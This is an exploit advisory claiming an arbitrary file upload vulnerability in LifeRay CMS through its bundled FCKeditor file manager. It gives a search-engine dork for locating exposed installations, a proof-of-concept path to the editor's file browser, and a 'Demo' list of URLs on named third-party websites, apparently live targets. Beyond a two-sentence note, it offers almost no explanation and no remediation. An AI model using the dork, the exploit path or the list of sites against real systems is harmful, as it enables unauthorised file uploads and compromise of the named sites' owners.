[+] Title: LifeRay CMS (Fckeditor) Arbitrary File Upload Vulnerability [+] Date: 2020/04/10 [+] Author: h4shur [+] Team: Persian Security Group [+] Vendor Homepage: www.liferay.com [+] Software Link: www.liferay.com [+] Tested on: Windows 10 [+] Category : Web Application Bugs [+} Dork : inurl:/web/guest/ inurl:/html/js/editor/fckeditor/ ### Notes: LifeRay allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications. ### POC: [+] http://site/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html ### Demo: [+] http://asd-ssg.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html [+] http://www.ap239.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html [+] http://franchise.hrblock.com.au/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html [+] http://www.eof.gr/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html [+] http://asd-ssg.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html [+] http://securefile.co/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html ### Special Thanks: * Po0ri4 & b4ckdo0r ### Contact Me : * Telegram : @h4shur * Email : h4shursec@gmail.com * Instagram : @netedit0r * twitter : @h4shur